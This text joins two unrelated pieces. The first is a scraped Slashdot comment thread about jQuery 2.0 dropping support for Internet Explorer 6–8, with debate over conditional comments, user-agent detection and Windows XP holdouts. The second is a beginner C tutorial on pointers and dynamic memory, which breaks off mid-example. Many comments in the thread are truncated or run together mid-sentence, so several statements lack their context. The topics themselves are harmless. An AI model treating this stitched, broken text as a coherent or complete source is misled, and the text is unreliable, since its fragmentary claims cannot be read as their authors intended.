Well, then you need to make a choice. Is this nifty new feature so useful that you risk alienating some of your website visitors?
Re:IE8 = "latest" version for many (0)
Anonymous Coward | more than 2 years ago | (#40642663)
It's not going to go away just because someone doesn't want to support it any more.
But it might go away once no one wants to support it anymore.
Re:IE8 = "latest" version for many (4, Informative)
cyber-vandal (148830) | more than 2 years ago | (#40642665)
You can use conditional comments to load the older version of JQuery for IE6, 7 and 8 so it's not as bad as it seems. Web designers have been doing this for years to hack around Microsoft's incompetence,
Re:IE8 = "latest" version for many (2)
Billly Gates (198444) | more than 2 years ago | (#40643115) support for its apps. That was 5 years ago and we still have these issues because it is so far behind and it is common that we should be implementing css 3 and html 5 and use JIT javascript engines to not leave these users behind, but the corps will make us use IE 8 until 2020 if they can.
Browsers should be upgraded frequently like Windows Update. If developers stop supporting like they did with 16 bit Win 3.x apps, dos, netscape, the corps move on. If not we still would be using Windows 3.1 with Netscape 4.7 today. Why? It works fine!
IE 8 in the US already drops down to 11% markethsare on the weekends according to! It is on its way out and it is time people moved iwth the times.
Hate (1)
Anonymous Coward | more than 2 years ago | (#40642329)
This is horrible - not because i like these browsers, but because so many people use jQ for just that - make web sites work in as many browsers as possible.
Re:Like (5, Informative)
Kate6 (895650) | more than 2 years ago | (#40642333)
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642473)
Re:Like (2)
man_of_mr_e (217855) | more than 2 years ago | (#40642537)
Or use Modernizr's browser identification.
Re:Like (2)
man_of_mr_e (217855) | more than 2 years ago | (#40642559)
This is fine for 1.9/2.0 but what happens when 2.1 and 2.2 come out? The API's will diverge.
I hope 1.9 stays api compatible, but I would doubt it.
Re:Like (3, Interesting)
Kate6 (895650) | more than 2 years ago | (#40642615)
So we might end up with some jQuery functionality silently being disabled in legacy versions of IE too. Big whoop.
Re:Like (1)
dingen (958134) | more than 2 years ago | (#40642649)
Once a version of jQuery 2.x comes out with an API which isn't compatible with 1.9, IE8 better be long forgotten.
Re:Like (1)
man_of_mr_e (217855) | more than 2 years ago | (#40642817)
jQuery comes out with new API's all the time.. Remember live was deprecated by delegate, then by on... this stuff seems to happen *EVERY* single version.
Re:Like (4, Informative)
dingen (958134) | more than 2 years ago | (#40642883)
But
.delegate(), .on() and .live() all still work with recent versions of jQuery, so your old code still runs with newer versions of the library. New features being introduced is not bad. The pain starts when old features are dropped.
Re:Like (1)
shutdown -p now (807394) | more than 2 years ago | (#40643371)
XP (and therefore IE6/7/8) is not going to be with us forever, either.
Re:Like (1)
Krojack (575051) | more than 2 years ago | (#40642721) (1)
Kate6 (895650) | more than 2 years ago | (#40642781)
Don't get me wrong, full API compatibility is one heck of a claim to make and I guess we'll have to see just how close they actually get to it indeed being full. But assuming they largely make good on their claim, this just isn't really major news. They're creating a more optimized version of their library for more modern browsers.
Big whoop.
Re:Like (4, Insightful)
madprof (4723) | more than 2 years ago | (#40642947)
Holy moley. I might be saying what others say but please, for the love of everything good, use conditional comments.
They've been around since IE5. You will love them.
Re:Like (1, Flamebait)
Kate6 (895650) | more than 2 years ago | (#40642987)
Re:Like (1)
cheesecake23 (1110663) | more than 2 years ago | (#40642503):Like (1)
Billly Gates (198444) | more than 2 years ago | (#40642711).
You Cheesecake23 have been misled by a vocal minority! [saveie6.com]
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40643071)
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40643279)
Is that site a joke, or was it written by a moron? I couldn't quite tell.
It is loaded with all sorts of seriousness and professionalism [saveie6.com] . The comments too from the front page just give it away.
“Now that I've switched to IE6, I'll never go back to Lynx again!”
Sue Donym
“Trying to get your website to work correctly in IE6 is like a puzzle game! Challenging and fun!”
Nathan
“Developing websites for other browsers than IE6 is just pure pain! The tables just don’t display the way they do in IE6.”
Dean T. P
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40642961)
The need to specifically code for IE6 and IE7 due to their crappy compliance with web standards has swallowed immense amounts of global developer effort, which could otherwise have been invested in improving the interwebs for everyone.
There is no *need* to code for old IEs.
There is just the web developers' *urge* of to produce flashy crappy blinking rolling sliding shaking tilting sites which make the user puke in less than five minutes.
Despite being cradle of the marquee tag, I find right now the old IEs to be a good anchor weight which forces web developers to make sites which are more "useful" than "look cool in my portfolio." Unfortunately, even the old IEs allow for too much crap...
Re:Like (1)
nedlohs (1335013) | more than 2 years ago | (#40643051)
Given most (not all) web development makes things worse, that seems like a good thing.
Re:Like (1)
TheSpoom (715771) | more than 2 years ago | (#40642585):Like (2)
cyber-vandal (148830) | more than 2 years ago | (#40642731)
This [microsoft.com] is a far better way since anything non-IE pretending to be IE will just ignore these. Web designers have been using these for years to load special CSS workarounds for all the bugs in IE.
Re:Like (1)
TheSpoom (715771) | more than 2 years ago | (#40643219) comments. Besides, using server-side handling keeps the HTML output cleaner since all the user gets is the single, correct script tag.
Conditionally include 1.9/2.0 (1)
kawika (87069) | more than 2 years ago | (#40643105).
They seem to be missing the point... (2)
Anonymous Coward | more than 2 years ago | (#40642249)?
Re:They seem to be missing the point... (0)
Anonymous Coward | more than 2 years ago | (#40642297)
Use 1.9 until 2014-04-08 (2)
tepples (727027) | more than 2 years ago | (#40642463)
Re:Use 1.9 until 2014-04-08 (1)
pak9rabid (1011935) | more than 2 years ago | (#40642529):Use 1.9 until 2014-04-08 (1)
JDG1980 (2438906) | more than 2 years ago | (#40642967) up for a variety of reasons (logistics, legacy compatibility, IE6 ActiveX crap, etc.) As a result, I think there will be heavy pressure on Microsoft to lease the source code for WinXP to trusted third parties for continued maintenance and service. Expect a carrot-and-stick approach from the affected organizations: lots of money offered in contracts if WinXP continues to be somehow supportable, combined with threats that if they have to redo everything to leave XP, they might as well switch to MacOS or Linux instead of upgrading to the newest version of Windows. And, of course, governments have even more tools than this at their disposal if they don't like what MS is doing.
There's a very real possibility that we will see a de facto fork of Windows within the next five years.
Viewing any web site with IE 8 is unsafe (1)
tepples (727027) | more than 2 years ago | (#40643069):Viewing any web site with IE 8 is unsafe (0)
Anonymous Coward | more than 2 years ago | (#40643191)
Sites can "recommend" it all they want. If governments and other organizations aren't willing to move beyond XP it doesn't matter.
Re:Viewing any web site with IE 8 is unsafe (1)
shutdown -p now (807394) | more than 2 years ago | (#40643381)
Most sites don't care about governments and large organizations, and target individual customers directly.
Re:Use 1.9 until 2014-04-08 (1)
dingen (958134) | more than 2 years ago | (#40642695) (1)
tepples (727027) | more than 2 years ago | (#40643089)] .
Re:It's a prisoner's dilemma (1)
Billly Gates (198444) | more than 2 years ago | (#40643353)
Google was instrumental in stopping IE 6 and 7 in late 2009. Hell 1/5 of the webs traffic was IE 6 in the US (not China) until Youtube, gmail, and others put notices that we wont support your browser anymore.
It worked very well. That and advertisements for Chrome helped too for clueless users who did not know where to get a better browser as statistics show the majority of new Chrome users are former IE users and not FF.
Business will upgrade when people stop supporting it. They left DOS behind, Win 16 apps behind, and Netscape intranet software behind too. If enough people stop supporting it they will leave. It is the opposite of software being sold RIGHT NOW in 2012 that still requires XP and even IE 8 keeps these guys locked in. Not everyone is big like google and yes, they lost some Google Doc accounts to Office 365 for their refusal of IE 7 support, but it works.
People are ignorant and if something works fine and developers take external costs and time to themselves for free they will never leave. Have the cool CSS 3 sites only work in IE 9 or later and people will eventually upgrade.
IE Version Code Breakdown? (2)
lavaforge (245529) | more than 2 years ago | (#40642289)? (5, Informative)
tobiasly (524456) | more than 2 years ago | (#40642501)? (4, Informative)
kawika (87069) | more than 2 years ago | (#40642757).
So it's like Python 3 (3, Insightful)
tepples (727027) | more than 2 years ago | (#40642291)
Re:So it's like Python 3 (2)
dririan (1131339) | more than 2 years ago | (#40642673)'t ship their own Python runtime in the first place) a simple EXE wrapper can use the right interpreter.
What part of this isn't easy?
Also, many developers make things compatible with both, which is made much easier with 2to3 [python.org] . Quite a few setup.py scripts use 2to3 automatically even, to be compatible with both using the normal python setup.py install.
EXE wrappers and third-party libraries (1)
tepples (727027) | more than 2 years ago | (#40643183):So it's like Python 3 (1)
the_demiurge (26115) | more than 2 years ago | (#40642761).
Too soon (2)
knetcomp (1611179) | more than 2 years ago | (#40642313)
Re:Too soon (1)
Billly Gates (198444) | more than 2 years ago | (#40642833)
I hate old IE versions as much as every other web developer, but I don't think this is the right way to go yet. One of the main reasons most developers love jQuery is because it allows them to forget about IE quirks and lack of compliance, and just write code. I think it would be better if they continued to support IE in their main branch, but also offer a "lite" version without IE support.
Knet, why don't you see 16 bit Windows 3.x apps anymore? Why did windows95 not fail? Why did XP not fail?
The answer is developers said enough is enough and stopped porting to ancient standards. XP should have died years ago and IE 6 will keep staying as long as people think their platforms are fine. Look it runs everything!
Corporations and cheapskates are setting the standard locked forever and IE 8 is 3 years old. But it is what IE 6 should have been and was still far behind. It is time to move on and I am not saying this for the sake of change for something that works.
Mobile devices are demanding HTML 5 and CSS 3 with JIT javascript engines. This legacy shit is a pain in the ass and moves the external costs to the developers. Maybe if internet growth was still desktop oriented but its not. It is a pain to write 2 different websites.Worse Windows 7 comes with IE 8 so these users who do leave XP by 2014 will probably lock their corporate desktops to it until 2020 while we STILL WAIT for iphone 2007 functionality. That is ridiculous.
Re:Too soon (1)
shutdown -p now (807394) | more than 2 years ago | (#40643401)
I think it would be better if they continued to support IE in their main branch, but also offer a "lite" version without IE support.
They did just that. The "lite" version is called 1.9, the full one is called 2.0.
Should Firefox below 10.0 as well. (0)
Anonymous Coward | more than 2 years ago | (#40642315)
Since 10.0 is the ESR that is the lowest supported baseline now even though it is only supposed to be used in corporations. Too many people still using the unsupported 3.6 release and below. Getting major web toolkits to drop it will provide a force to push people up to date. Then when ESR 17 and 24 come out do the same.
Unfortuatley IE 8 will be here for a while. Purely because Microsoft won't give anything above it for XP. XP is here to stay for a long time despite being "officially" dropped in 2014. Yes you can install other browser on XP but not in corporate controlled environments.
Re:Should Firefox below 10.0 as well. (1)
furbearntrout (1036146) | more than 2 years ago | (#40643351)
Missing the point (4, Informative)
bobetov (448774) | more than 2 years ago | (#40642417)? (5, Insightful)
Anonymous Coward | more than 2 years ago | (#40642421)
Find, finally kill the bastards. But 8?! This is the last IE available for XP, which is still widely used in companys....
Good thing (2)
mpol (719243) | more than 2 years ago | (#40642429):Good thing (1)
man_of_mr_e (217855) | more than 2 years ago | (#40642595)
More than likely, it's the same code for IE6/7/8 that they're dropping. If you leave it for 8, you may as well leave 6 and 7, because you don't gain much.
Re:Good thing (2)
Billly Gates (198444) | more than 2 years ago | (#40642877):Good thing (0)
Anonymous Coward | more than 2 years ago | (#40643411)
I have to support a lot for a gov site. I don't know what your corporate policy may be, but clients start getting
/really/ flustered when I show them the pricing structure for IE support...
I'm willing to go back to IE5, but nobody's ever taken me up on what that would cost. IE7 is an extra 20% on
/all/ development costs (plus features being removed or replaced with crippleware) and IE6 is 50% beyond that.
Some of those numbers are to keep up with training on new technologies while having to support relics.
Now, there's a lot of infrastructure and systems in place to try to make this work -- but it's all stuff that takes real time for me to learn, write up, troubleshoot. It slows down debugging, makes the libraries slower, and basically results in horribly 'forked' applications. Or flash.
I realize a boss is a boss is a boss and can say anything they want. But have you tried giving yours an itemized timesheet where they see that "IE6 support constitutes 35% of the total cost of the project" ? Or that "making this little circle draw right here in IE7 actually slows the application by 5000%, and while you can fix it, the resulting fork has tripled your code base and made your 5 minute test suite take an hour?
At a certain point, your
/boss/ will start billing IT for refusing to install firefox or chrome, even if it's just for your web app.
At an old job our web app actually got people off of IE5 when the CEO of a fortune 500 dragged their CIO into their office and told them to find a way to upgrade, get firefox installed for an entire department, or resign. Now, that company didn't bill extra for old support (they should have). We just didn't have the resources to get our application working in IE5 (or I wasn't good enough, same thing).
The thing is, your time is probably cheaper than those desktop upgrades. Because as an employee, they think of you as a black-box that gets-the-job-done-per-month. You need to present IE6 (and 7, and 8, and probably 9 for the lack of webgl) as an unecessary operational expense. Just like some apocryphal mainframes in a modern bank where 100 meg hard drives cost thousands to replace, but they still need that old COBOL reporting system from the 60's... IE6 is a liability and a threat to your mission success.
Re:Good thing (1)
Billly Gates (198444) | more than 2 years ago | (#40642985)
Issue I have with conditional comments is the bloated javascript libraries are still loaded and now they are bloated by 2x, even if they are ignored by the browser. IE 6 crashes with too much javascript.
For example in IE 6 I can load msnbc.com fine and it still is compatible. But it will freeze up randomly when these annoying social media scripts start up. I have to alt tab and kill it and use a custom hosts file for it to even load half the time.
The costs add up with ISPs now putting in caps and raising bandwidth rates as their competitors die off. 2 megs a view is very expensive and not friendly to those still on dial up vs half that without jquery
... especially 2 jqueries loading up.
So in essence I am in favor of 2.0 but will not use it for awhile for these reasons. If old IE finally dies out by 2014 then I will upgrade. I have a feeling the corporations are terrified of new browsers after IE 6 hell and will stay with 8 until 2020 until developers stop supporting IE 8. It is already becoming the new IE 6 of this decade and MS now has IE on an annual release trek so IE 18 will be out by then.
Dojo Toolkit (1)
MatrixCubed (583402) | more than 2 years ago | (#40642489)
Another reason why Dojo Toolkit [dojotoolkit.org] is more attractive than jQuery. Clients don't care that the JS executes however many milliseconds faster, and they also don't care that the developers have an easier time not supporting older browsers.
What they do care about is stuff that "just works", and being able to add new features at the speed of *click*. Like any tool, if it hinders you from delivering either of these, it's fit for the trip out behind the woodshed.
I'd like to hear comments from other toolkit devs (Sencha, YUI, etc).
Re:Dojo Toolkit (-1)
Anonymous Coward | more than 2 years ago | (#40642613)
I see all toolkits as crutches for people who can't be bothered to learn Javascript. The resulting code from using one of those toolkits also makes it impossible for someone who knows Javascript to debug the toolkit shit-looking code.
Re:Dojo Toolkit (1)
Anonymous Coward | more than 2 years ago | (#40642699)
Re:Dojo Toolkit (2)
cyber-vandal (148830) | more than 2 years ago | (#40643085):Dojo Toolkit (2)
steveb3210 (962811) | more than 2 years ago | (#40643161)
Because looking at code littered with var e = document.getElementById('stuff'); is just so much more elegant and non-shit-looking than $('#stuff')..
This won't really affect anything. (2, Insightful)
Kate6 (895650) | more than 2 years ago | (#40642509)
All you need is some back-end code to examine the user's browser's "useragent" string and figure out which version of jQuery to serve.
<?php
preg_match( '/MSIE ([0-9\.]+)/', $_SERVER[ 'HTTP_USER_AGENT' ], $matches );
if ( ( count( $matches ) == 2 ) && ( floatval( $matches[ 1 ] ) < 9.0 ) )
echo "<script type='text/javascript' src='jQuery-1.9.min.js'></script>";
else
echo "<script type='text/javascript' src='jQuery-2.0.min.js'></script>";
?>
Re:This won't really affect anything. (1)
flux (5274) | more than 2 years ago | (#40642605):This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40642687)
2.0 will implement the same features as 1.9 but in more optimized ways, by relying on browser features not available in legacy versions of IE. The whole point of having a standardized API is that you can provide different implementations of that API.
Re:This won't really affect anything. (0)
Anonymous Coward | more than 2 years ago | (#40642959)).
Presented to you in glorious PSEUDOCODE!!!
2.0:
function doSomeStandardThing()
{
someStandardAction();
}
Compare to, in 1.9:
function doSomeStandardThing()
{
if(IE6)
{
doSomeNonstandardIEBullshit();
}
else if(IE7)
{
doSomeDifferentNonstandardIEBullshit();
}
else if(IE8)
{
goodLordDoWeSeriouslyHaveToDoMoreNonstandardBullshitForIE();
}
else
{
someStandardAction();
}
}
Now, multiply that by every point at which IE pulls something from way the hell out in left field to do something everyone else agreed on doing a single, different way, and you'll quickly see that 2.0 will run faster without having to make all these extra checks, and will be smaller without having to carry all the extra weight of special magical IE nonsense around.
Re:This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40643033)
Re:This won't really affect anything. (2)
dingen (958134) | more than 2 years ago | (#40643021):This won't really affect anything. (1)
cyber-vandal (148830) | more than 2 years ago | (#40643119)
Speed.
Re:This won't really affect anything. (1)
furbearntrout (1036146) | more than 2 years ago | (#40643325)
Re:This won't really affect anything. (1)
steveb3210 (962811) | more than 2 years ago | (#40643179)
Re:This won't really affect anything. (1)
Kate6 (895650) | more than 2 years ago | (#40643283)
By all means, though, go ahead and start a whole sub-thread about what the most optimal way to do the browser detection would be. There seems to be a lot of commenters who feel it ought to be done using IE conditional comments.
Re:This won't really affect anything. (0)
Anonymous Coward | more than 2 years ago | (#40643291)
Nobody cares.
Conditional Comments are your friend... (0)
Anonymous Coward | more than 2 years ago | (#40642647)
Remember that IE can be used in Conditional comments
that is
<!-- if IE lt 9 ->
jquery 1.9
< endif -->
So use both, that's why there's API parity.
Dropping IE8 support at this time is unacceptable (2)
JDG1980 (2438906) | more than 2 years ago | (#40642803).
Re:Dropping IE8 support at this time is unacceptab (0)
93 Escort Wagon (326346) | more than 2 years ago | (#40642957)
Workplaces should actually be the least problematic. You can dictate what version of IE people are using, and at this point any responsible IT department REALLY should have a migration plan in place for getting rid of any legacy XP boxes.
Heck, if a workplace hasn't already moved to 7 by now - they've got bigger issues than worrying about jQuery.
You didn't even read the whole summary (0)
Anonymous Coward | more than 2 years ago | (#40643027)
Their 1.9 branch will continue to support IE8 at least as long as Microsoft does.
Re:Dropping IE8 support at this time is unacceptab (0)
Anonymous Coward | more than 2 years ago | (#40643045)
JQuery 2.0 won't see really widespread use on the 'desktop' web until the userbase has largely moved away from XP. In the mobile world, though, we are grateful for any speed boost, so it'll build up a head of steam there for awhile.
This isn't anti-MS flamewar crap. JQuery is fully embraced by Microsoft, and is basically their ordained way of doing things in ASP.net MVC.
If JQ2.0 has major features that developers really want/need, I would expect that MSFT would maintain their own fork for older versions of IE.
Hell, if it's call compatible with 1.9, a few simple lines of javascript should be sufficient to load the right library for the browser. Browser detection in javascript is an ugly hack, but it'd be a workaround, at least.
Or you could use chormeframe, but that's an even uglier hack, IMO.
Version numbers causing confusion (1)
dnwheeler (443747) | more than 2 years ago | (#40642897)
I think the primary cause of the confusion is that there are two version numbers. It sounds like the "new" version is dropping IE6-8 support when, in fact, both 1.9 and 2.0 are "new" versions. It would have been better if they shared a version number with some sort of modifier:
2.0 - 2.0 without legacy support
2.0L - 2.0 with legacy support (IE6-8)
Simply changing the version number makes the difference clear while mitigating the worry/panic.
I don't use jQuery, here's why (-1)
Anonymous Coward | more than 2 years ago | (#40642915)
I don't use jQuery,
Now I have nothing but love for people want to build things that make it "Easier" and "Faster" for everyone, but listen to me for a sec:
Drivers
|
Windows-Linux-MacOS
|
Abstraction Layers over the OS, Firefox, Chrome
|
Javascript API's (DOM, SVG, WebGL, Web Audio, etc)
|
Javascript Libraries
There's already three levels of
... cruft... if you will. This is the type of code bloat that plagues Perl (everytime you update Perl, you have to go recompile every framework, like DBI/DBD, when you have hundreds of these things, you may as well just cut them all out and roll your own)
In my opinion there is no point to using jQuery, it doesn't add anything that you can't do without it. 50% of the time when I try to look up how to do something in javascript, I get some "simple javascript" that's actually jquery code. Stop it. If you want to use jQuery, please understand the underlying code, and don't simply assume that what you write is efficient. jQuery is a huge source of code bloat, where someone wants something that can be written in two likes of javascript, but they instead include a 250KB javascript library to do it.
If the code you write will be faster and more compact, using jquery, by all means go ahead. But if you're trying to do something that is already stupidly simple to do, then please stop and think about it. For example, writing a TTS engine or NES emulator, using jQuery, is just a bad idea. There is no opportunity to write assembler in interpreted languages. Maybe that needs to change. Maybe more lower-level API's do need to be exposed through Javascript (OpenCL/DSP, OpenGL shaders, etc) maybe Javascript needs an opcode cache like PHP, where frequently used script hashes (eg jQuery) can remain in a compiled state in the browser, thus making it beneficial to use jQuery over rolling your own code all the time.
Re:I don't use jQuery, here's why (1)
steveb3210 (962811) | more than 2 years ago | (#40643223)
..
Dewey (2)
michaelmalak (91262) | more than 2 years ago | (#40642925)
Legacy Branching? (2)
kiehlster (844523) | more than 2 years ago | (#40643007)
jQuery freezes at 1.9 (0)
Anonymous Coward | more than 2 years ago | (#40643017)
And so having completed a library that addresses the weaknesses and incompatibilities it seeks to address, jQuery will reach it's ultimate version at 1.9. jQuery 2.0 won't be very popular for years.
Remember, IE 7 is old, but people are buying computers less frequently, so I don't think it's going away so quickly. It is going to be REALLY hard to kill Windows XP. And so it will be really hard to get everyone onto IE9.
Anyway, I think the future browsers will just be made with jQuery in mind. They'll probably all run a version of the jQuery selector natively. I think future browsers will integrate jQuery away.
Re:jQuery freezes at 1.9 (1)
dingen (958134) | more than 2 years ago | (#40643103)
Windows XP doesn't have to die for IE8 to go away. Every other browsers' latest version runs great on XP.
jQuery native support (2)
JDG1980 (2438906) | more than 2 years ago | (#40643029).
THANK GOD! MAYBE THIS IS THE BEGINNING OF THE END! (0)
Anonymous Coward | more than 2 years ago | (#40643039)
I'm having a "Gangs of New York" moment here yall.
"The Earth turns, but we don't feel it move. And one night you look up. One spark, and the sky's on fire."
-Amsterdam Vallon
hmm (1)
buddyglass (925859) | more than 2 years ago | (#40643281) | http://beta.slashdot.org/story/171801 | CC-MAIN-2014-42 | refinedweb | 5,375 | 71.24 |
Someone please help me!
I have a strange issue with the getParameters function in FMOD (Last Version (today october 1st 2014)) and unity 4!
Using the example CAR ENGINE for get parameters in online PDF, I did the same as the script was there.
IF I use a bank with no parameters, just PlayOneShot, it works fine. BUT Parameters dont make any sound. Here’s my code example:
using UnityEngine; using System.Collections; using FMOD.Studio; public class SomCarro : MonoBehaviour { FMOD.Studio.EventInstance engine; private FMOD.Studio.ParameterInstance engineRPM; public float contador; // Use this for initialization void Start () { contador = 0; // the counter to increment a value, just for test; engine = FMOD_StudioSystem.instance.GetEvent ("event:/Vehicles/Car Engine"); engine.getParameter ("RPM", out engineRPM); engine.start (); } // Update is called once per frame void Update () { contador = contador+100; engineRPM.setValue(contador); if (contador > 6000){ contador = 0; } } void OnDisable(){ engine.stop (FMOD.Studio.STOP_MODE.IMMEDIATE); engine.release (); } }
- João Francisco Ligeiro asked 4 years ago
- last edited 4 years ago
- You must login to post comments
The code looks fine, the only thing you’re missing is setting the position of the event. The engine is a 3D event so you need to make sure that your listener is near the event. When you call getEvent without setting the 3D attributes it will default to the origin [position = (0,0,0)]. It will be silent if it is too far away from the FMOD Listener.
Add this line to Update to set the 3D position of the FMOD Event:
engine.set3DAttributes(FMOD.Studio.UnityUtil.to3DAttributes(gameObject));
- Guest answered 4 years ago
- last edited 4 years ago
First of all, I did a mistake putting that sentence you mentioned in the Start function…. “OMG it didn’t work! The sound stays in the place!” After my distraction, I’ve input this line in update! MANY MANY MANY Thanks! It really works and I spent my last 2 weeks trying to solve this, and i didn’t found anything! THANKS! IT WORKS VERY WELL!
- João Francisco Ligeiro answered 4 years ago | http://www.fmod.org/questions/question/out-myvar-getparametersx-not-working/ | CC-MAIN-2018-43 | refinedweb | 344 | 59.8 |
Intro to C Pointers and Dynamic MemoryMemory is the oxygen of a C program. Doing anything constructive in C involves using memory. As we saw last time, memory for stack variables is cleaned up automatically. More advanced C programing requires using dynamic memory allocation, which you have to manage yourself.
Dynamic memory allocation allows you to get blocks of memory of any size (within reason), and control them using pointers. Pointers have a reputation for being hard to deal with, but the basic mechanisms are simple. The only mental adjustment is the idea of dealing with something that refers to something else.
Warning! This is intended as a quick, rough introduction to a deep topic. The goal is to just take the edge off of C a bit, not explain every aspect of memory management. Before you go out and write sensitive code (particularly security or server software), you must take the time to understand the deeper ramifications of memory management. You've been warned.
Pointer Syntax
It's obvious a pointer points to something, but what? A pointer refers to a location in memory. In other words, it refers to a piece of data. Here's a basic pointer example:
#include <stdio.h>
main ()
{
// declare an int variable and an int pointer variable
int number;
int* pointer;
// set a value for 'number'
number = 5;
// now link 'pointer' to 'number' by putting the 'addressof'
// operator (&) in front of the number variable
pointer = &number;
// print values of number and pointer
// note the %p marker is used for pointer and &number
printf( "value of number: %i\n", number );
printf( "value of &number: %p\n", &number );
printf( "value of pointer: %p\n", pointer );
// print value of pointer's target (number) using
// the asterisk (*) operator
printf( "value of pointer's _target_: %i\n", *pointer );
}
This gives you something similar to this:
value of number: 5
value of &number: 0xbffffc5c
value of pointer: 0xbffffc5c
value of pointer's _target_: 5
Notice how the pointer simply stores the address (location) of the original variable. That's why the second and third lines of output have the same value. It may seem like this code doesn't have much practical use, but we're just trying to get the basic syntax straight first.
The key thing here is that just like a normal variable, the pointer variable has a value. With a normal variable, the literal value (such as "5") is the interesting data. With a pointer, the interesting data is what's at the memory address that it refers to (0xbffffc5c in this case). You can get the value of the target variable using the asterisk:
printf( "value of pointer's target: %i\n", *pointer );
This is called dereferencing. The star does all the necessary low-level calculations to fetch the data so you don't have to do the math yourself.
Hexidecimal Notation
The value of pointer is displayed in hexadecimal format (just like web colors). Don't be intimdated by the alien notation, it's still just a number. Hexidecimal numbers are expressed in base 16, meaning each digit has 16 different values. Decimal numbers (the ones we're used to) are expressed in base 10:
Decimal has 10 possible values for each digit:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9
Hexidecimal has 16 possible values for each digit:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f
The 0x part is just a prefix to tell C that it's a hexidecimal number. The actual numeric value is bffffc5c. So now you can sleep tonight knowing what is meant by the term "base 16".
Pointers Making You See Stars?
Pointer syntax tends to confuse novice C programmers. The problem is that the asterisk (aka "star") is used for two distinct purposes: in a pointer declaration and when returning the value of the target.
Here's an example of each:
// declare a basic int variable
int number = 18;
// use the asterisk to _declare_ a pointer
int * numberPointer;
// assign a value to the pointer
numberPointer = &number;
// use the asterisk again, this time to _fetch_
// the value of the _target_ variable (number)
printf ("Value of target: %i", *numberPointer);
In an ideal world, a pointer declaration wouldn't contain an asterisk, but this is the syntax that we have in our universe.
Copy Versus Reference
Keep in mind the difference between a pointer which refers to a variable and a copy of a variable. Here's an example:
#include <stdio.h>
main ()
{
float myNumber;
float myNumberCopy;
float * myNumberPointer;
// first, set an initial value
myNumber = 1.618;
// copy the value
myNumberCopy = myNumber;
// make a pointer to the value using the
// ampersand, known as the "addressof" operator
myNumberPointer = &myNumber;
// change the original
myNumber = 2.0;
// now check the values.
// be sure to use the star (*) to fetch the value
// of myNumberPointer's target
printf( "myNumber: %f\n", myNumber );
printf( "myNumberCopy: %f\n", myNumberCopy );
printf( "myNumberPointer: %f\n", *myNumberPointer );
}
Here's the output:
myNumber: 2.000000
myNumberCopy: 1.618000
myNumberPointer: 2.000000
The copy gets its own value, but the pointer stays linked to the original.
Malloc and Free Functions
The memory for basic variables such as ints, floats and simple arrays are handled automatically. Sometimes, though, you need to exercise more control. Dynamic memory management means that you can reserve a large block of memory, but you have to take reponsibility for freeing it later.
The malloc family of functions are used to deal with these blocks of memory. The most basic of these is malloc(), which takes a size as input and returns a pointer to the a new block of memory. The term "malloc" is short for "memory allocate". Here's a simple example:
// reserve 4 bytes of memory
void * memoryBlock = malloc ( 4 );
The "void *" type means that the memoryBlock will store a pointer to a block of memory with an undefined type. That is, we're not specifying what kind of data will go in there. When you're done with the block of memory, you have to release it using the free() function:
free ( memoryBlock );
If you don't do this, you'll have a memory leak on your hands (yuck!).
Making a Memory Block Useful
Allocating 4 byte memory block isn't all that interesting. What we really want to do is get a memory block that can hold a certain number of values. For example, if we want to hold 20 int values, we can do this:
void * memoryBlock = malloc ( sizeof(int) * 20 );
We use the sizeof() function to calculate the size of a particular type of variable. That number is then multiplied by the number of values we want to store (20).
We can also use a variation of the malloc function, called calloc. The calloc function takes two arguments, a value count and the base value size. It also clears the memory before returning a pointer, which is useful in avoiding unpredictable behavior and crashes in certain cases:
void * memoryBlock = calloc ( 20, sizeof(int) );
A memory block like this can effectively be used as a more flexible array. This approach is actually much more common in real-world C programs. It's also more predictable and flexible than a "variable size array" (mentioned in the previous tutorial).
But how do we get and set values in each slot? One common approach is to use the ++ and -- operators to move the pointer forward or back in the memory block. In order to do this, we should set the correct type for the returned memory block:
// create a "moveable" int pointer
int * memoryBlock = calloc ( 10, sizeof(int) );
This allow the ++ operator to move forward the exact size of an int variable each time, effectively moving forward one "slot" in our array-like memory block.
#include <stdio.h>
#include <stdlib.h> // for calloc and free
#include <time.h> // for random seeding
main ()
{
const int count = 10;
int * memoryBlock = calloc ( count, sizeof(int) );
if ( memoryBlock == NULL )
{
// we can't assume the memoryBlock pointer is valid.
// if it's NULL, something's wrong and we just exit
return 1;
}
// currentSlot will hold the current "slot" in the,
// array allowing us to move forward without losing
// track of the beginning. Yes, C arrays are primitive
//
// Note we don't have to do '&memoryBlock' because
// we don't want a pointer to a pointer. All we
// want is a _copy_ of the same memory address
int * currentSlot = memoryBlock;
// seed random number so we can generate values
srand(time(NULL));
int i;
for ( i = 0; i < count; i++ )
{
// use the star to set the value at the slot,
// then advance the pointer to the next slot
*currentSlot = rand();
currentSlot++;
}
// reset the pointer back to the beginning of the
// memory block (slot 0)
currentSlot = memoryBlock;
for ( i = 0; i < count; i++ )
{
// use the star to get the value at this slot,
// then advance the pointer
printf("Value at slot %i: %i\n", i, *currentSlot);
currentSlot++;
}
// we're all done with this memory block so we
// can free it
free( memoryBlock );
}
This isn't the only correct way to do this sort of thing, just one approach. Also, keep in mind that since a memory block can be treated as an array, you're likely to see things like this in code:
char * myString;
Since a string is an array of individual characters, a memory block filled with individual characters can act as a string as well.
Arrays of Arrays
Multi-dimensional arrays are not unique to C, but deserve mention here. They basically come in two flavors. The major basic form:
int grid [10][10];
...and the more flexible form you're likely to see in the wild:
int ** numberGrid;
This may look a bit strange, but remember two points:
1. A memory block is represented as a pointer (void * memoryBlock)
2. A memory block can act as an array
So if this is an array:
int * numberArray;
... this can be an array of arrays:
int ** numberGrid;
Be careful, though, because this sort of declaration could also be treated as an array of pointers to specific ints, which is a subtle difference.
Array of Strings
Dealing with strings in C is really deserving of its own post so I'm not going to go into deep details here, but there's one convention that you should be aware of for general code reading:
char ** inputValues;
This sort of thing is usually an array of strings. Remember, a string is an array of individual characters, so a an array of strings is a two-dimension array of characters.
Final Example
Here's a short program that illustrates all of these points.
#include <stdio.h>
#include <stdlib.h>
int main ()
{
// number of strings
const int count = 5;
// declare an array of strings
char ** stringArray = calloc ( count, sizeof(char *) );
printf("stringArray address: %p\n", stringArray);
